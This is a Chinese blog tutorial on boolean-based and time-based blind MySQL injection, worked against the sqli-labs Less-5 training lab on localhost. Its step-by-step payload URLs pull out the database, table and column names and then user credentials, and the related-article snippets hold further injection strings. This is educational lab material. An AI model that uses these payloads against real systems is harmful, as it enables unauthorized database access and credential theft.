MYSQL布尔注入

最新推荐文章于 2024-07-25 12:56:57 发布
最新推荐文章于 2024-07-25 12:56:57 发布
阅读量423 收藏
点赞数
文章标签: mysql 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ZccAc/article/details/108628566
版权

MYSQL布尔注入

原理为利用mid()获取字符,利用ord()将字符转为ASCII码,利用>、<和=来确定字符的范围。
获取数据库名长度
http://127.0.0.1/sql/sqli-labs/Less-5/?id=1’ and 1>2 or length(database())=8#

在这里插入图片描述

获取数据库名
http://127.0.0.1/sql/sqli-labs/Less-5/?id=1’ and 1>2 or ord(mid(database(),1,1))=115#
为 ‘s’
在这里插入图片描述

依次类推得到名字为’security’
查询表数量
http://127.0.0.1/sql/sqli-labs/Less-5/?id=1’ and 1>2 or (select count(*) from information_schema.tables where table_schema=database())=4#
在这里插入图片描述

表数量为4
获取第一个表名的长度
http://127.0.0.1/sql/sqli-labs/Less-5/?id=1’ and 1>2 or length((select table_name from information_schema.tables where table_schema=database() limit 0,1))=6#
在这里插入图片描述

为6
获取第一个表的名字
http://127.0.0.1/sql/sqli-labs/Less-5/?id=1’ and 1>2 or ord(mid((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=101#
在这里插入图片描述

得到第一个字节为’e’
依次类推得到第一个表为’emails’
得到后几个表为
‘referers’,’users’,’ungents’

获取users字段的数据量
http://127.0.0.1/sql/sqli-labs/Less-5/?id=1’ and (select count(*) from users)=13#
可得共有13条数据
在这里插入图片描述

获取users字段数量及长度
数量
http://127.0.0.1/sql/sqli-labs/Less-5/?id=1’ and 1=2 or (select count(*) from information_schema.columns where table_name=‘users’ and table_schema=database()) =3#

在这里插入图片描述

表中字段为3
获取第一个字段名长度
http://127.0.0.1/sql/sqli-labs/Less-5/?id=1’ and 1=2 or length((select column_name from information_schema.columns where table_name=‘users’ and table_schema=database() limit 0,1)) =2#
获取长度为2
在这里插入图片描述

获取第一个字段名首字母为’i’
http://127.0.0.1/sql/sqli-labs/Less-5/?id=1’ and 1=2 or ord(mid((select column_name from information_schema.columns where table_name=‘users’ and table_schema=database() limit 0,1),1,1)) =105#
在这里插入图片描述

依次得到第一个表名为id
后面表为username,password。
获取username字段的第一条数据
http://127.0.0.1/sql/sqli-labs/Less-5/?id=1’ and 1=2 or length((select username from users limit 0,1)) =4#
长度为4
在这里插入图片描述

第一条数据第一个字母为’D’
http://127.0.0.1/sql/sqli-labs/Less-5/?id=1’ and ord(mid((select username from users limit 0,1),1,1)) =68#
在这里插入图片描述

依次得到第一个username为Dumb
第一个password字段数据长度为 4
http://127.0.0.1/sql/sqli-labs/Less-5/?id=1’ and 1=2 or length((select password from users limit 0,1)) =4#
在这里插入图片描述

第一条数据为与上面username对应为Dumb

后面可依次得到接下来的username和password

延时注入
通过sleep搭配if语句进行注入
适用于无回显状态
语句
http://127.0.0.1/sql/sqli-labs/Less-5/?id=1’ and sleep(if(length((select database()))>8,0,5))#
在大于8 的时候出现延时超过5秒现象,得到数据库名长度为5
在这里插入图片描述

接下去步骤如同布尔注入相同,只是用的函数不同

ZccAc
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
mysql盲注_Mysql 布尔型盲注手工注入详解
weixin_42524100的博客
01-18 548
0x00 什么叫布尔型盲注布尔布尔(Boolean)型是计算机里的一种数据类型,只有True(真)和False(假)两个值。一般也称为逻辑型。盲注在注入时页面无具体数据返回的注入称之为盲注,一般是通过其他表现形式来判断数据的具体内容布尔型盲注页面在执行sql语句后,只会显示两种结果,这时可通过构造逻辑表达式的sql语句来判断数据的具体内容。是不是听的云里雾里的,没关系,继续看0x01 Mysql...
mysql练习注入语句
01-21
这里,我们将学习 MySQL 的一些基本知识点,包括MySQL数据库函数、布尔盲注语句、时间盲注语句、宽字节注入、黑名单和白名单等。 一、MySQL数据库函数 MySQL提供了许多有用的函数,可以帮助我们更好地管理和操作...
Mysql注入 -- 布尔注入
weixin_41489908的博客
05-14 1458
千万不要在你还没辞职的时候,告诉你同事说要辞职了。。。 ---- 网易云热评 一、常用函数 1、mid(str,1,5):取字符串str的前5个字节 2、ord():转换成ASCII码 3、length():统计长度 4、 ascii():将字符转换ASCII 二、实例演示 1、and 1=1 访问http://192.168.139.129/sqli/Less-8/?id=1'and1=1--+返回正确 2、and 1=2 访问http://192.168...
MySQL布尔盲注
一个普普通通的博客
03-01 1481
Mysql注入布尔盲注
SQL注入MySQL注入
weixin_51583033的博客
12-20 842
SQL注入MySQL注入
Mysql注入读写文件
zsdddddss的博客
12-25 177
Mysql注入读写文件
Mysql 手工注入
weixin_45625450的博客
09-14 779
p=1&id=4’ and 1=2 union select 1,group_concat(column_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 from information_schema.columns where table_name=‘表名’ #x%’ and 1=2 union select 1,2,group_concat(username,password),4,5,6,7,8,9,…
mysql注入
resilient的博客
08-03 210
1.mysql中数字注入   2.mysql中字符串注入 #注释 ---sksal 也会当成注释来处理
网络安全进阶学习第十课——MySQL手工注入
p36273的博客
08-02 2173
多了一列选项,由于正确就会执行sleep(1),所以相应时间最长的那一个就是正确的结果,这里就是14。这样就知道security这个数据库里面所有的表名字:emails,referers,uagents,users。现在这样子就知道了users这个表的所有字段名,假设知道了字段是:id,username,password。好了这样就知道所有的表名字是:emails,referers,uagents,users。,这个函数第二个参数要是有特殊字符是会报错的,这里0x7e是“~”的URL编码。
mysql 报错注入语句_mysql注入
weixin_42165583的博客
02-01 284
SQL的注入类型有以下5种:Boolean-based blind SQL injection(布尔注入)Error-based SQL injection(报错型注入)UNION query SQL injection(可联合查询注入)Stacked queries SQL injection(可多语句查询注入)Time-based blind SQL injection(基于时间延迟注入)u...
Mysql注入总结1
08-03
MySQL注入是一种常见的网络安全漏洞,它允许攻击者通过输入恶意的SQL语句来操纵数据库,获取敏感信息或执行非授权操作。以下是对标题“Mysql注入总结1”和描述中涉及的知识点的详细解释: 1. **UNION SELECT 注入**...
mysql后台注入.zip
04-28
MySQL后台注入是一种安全漏洞,它发生在Web应用程序中,允许攻击者通过输入特定的SQL语句来操纵或访问数据库。这种漏洞通常源于不安全的编程实践,例如没有正确地过滤、转义或验证用户输入的数据。当这些数据被直接...
JDBC对MySQL数据库布尔字段的操作方法
09-03
本篇文章将深入探讨如何使用JDBC来操作MySQL数据库中的布尔字段,特别是在处理BIT(1)类型的布尔字段时需要注意的细节。 首先,MySQL数据库中的布尔类型通常表示为BIT(1),这是因为MySQL并没有原生的BOOLEAN或BOOL...
sql注入讲解ppt.pptx
08-10
4. 布尔盲注:使用布尔逻辑来注入 SQL 语句。 七、SQL 注入常用知识: 1. 注释符:#、--、+ 等符号。 2. 联合查询:使用 UNION keyword 来连接两个查询结果。 3. ORDER BY:使用 ORDER BY keyword 来排序查询结果...
MySQL中实现动态表单中JSON元素精准匹配的方法
夜郎King的博客
07-24 1366
本文重点讲解如何在将设计好的动态表单信息进行提取,比如进行模板数据导入的时候,可以根据不同的表单类型,比如根据单行文字框的名字来动态设置值,也可以在导数数据时,知道将数据库的性别一列保存的1和2翻译成男和女这两种属性。这都需要我们精准的提取表单中的不同的信息。通过本文,可以了解如何正确的操作动态表单信息,同时了解如何从表单中查找表单元素。
MySQL的面试题,从简单到困难三道题目
最新发布
在那一刻,我们或许会发现自己站在了时间的另一岸,以更加成熟和宽广的胸怀,去拥抱那份隔代相传的深情。
07-25 455
需要注意的是,虽然哈希索引在某些场景下具有优势,但由于其不支持范围查询和排序操作,且哈希冲突会影响性能,因此在大多数情况下,B+Tree索引仍然是MySQL中最常用的索引类型。
Mysql
qq_65186476的博客
07-25 988
Mysql
mysql高阶语句
qq_59169480的博客
07-24 734
高级语法的查询语句。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值